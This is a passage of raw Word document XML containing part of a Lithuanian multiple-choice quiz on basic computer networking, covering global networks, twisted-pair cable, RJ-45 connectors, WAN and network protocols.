      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ai viename kabinete esantis tinklas</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714A2CFB" w14:textId="34723003"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c) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ai pasaulinis tinklas</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB15EAC" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45AC9710" w14:textId="1482D3D7" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>4. K</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą vadiname</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>visuotini</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> tinkl</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092C20A6" w14:textId="555EE521"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a) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ai organizacijos tinklas</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CED3FFE" w14:textId="41C13C37"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b) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ai </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>tame pačiame pastate</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>esantis tinklas</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BCDC40" w14:textId="1FF0A15E"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c) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ai pasaulinis tinklas</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E877B76" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5A4928" w14:textId="7DAC22D8" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>5. Kiek porų sudaro vytos poros kabelį (</w:t>
      </w:r>
      <w:r w:rsidR="008062F8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">angl. - </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>twistedpair), naudojamą ETHERNET tinkluose?</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB56F6E" w14:textId="29B8626E" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) 4</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51809804" w14:textId="21A4EA7B" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) 6</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D54AF1D" w14:textId="4EC44653" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>c) 8</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0463C0FA" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44CEC753" w14:textId="270CDBD3" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>6. K</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>urios</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>jungtys naudojamos kompiuterių prijungimui prie tinklo?</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC1822F" w14:textId="662D3400" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) RJ-58</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AC2668" w14:textId="6F30C927" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) RG-45</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4A3BBF" w14:textId="3DA1BF40" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>c) RJ-45</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4503FE44" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E2F1AC" w14:textId="1EB90BA4" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>7. Kas yra WAN?</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5DFA72" w14:textId="7953C604"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a) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>lobalusis tinklas</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5DD2A2" w14:textId="1DE084A9" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) World Wide Web</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D668E47" w14:textId="494E0EF3"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c) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>asaulinis kompiuterių tinklas</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016E5B24" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="626D3CB1" w14:textId="713BDC60" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>8. K</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą vadiname</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> protokol</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BE38BB" w14:textId="0C909EDF"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a) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>rocedūrų ir taisyklių rinkin</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>, kuris reguliuoja ryšio tam tikrame tinkle nustatymo procedūrą</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03931D07" w14:textId="520DF21A"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b) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ylų persiuntimo būd</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD46C5" w14:textId="421AC445"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c) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>aisyklių visu</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>mą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>, apibrėžian</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>čią</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>duomenų mainų būdą tarp kompiuterinių sistemų</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
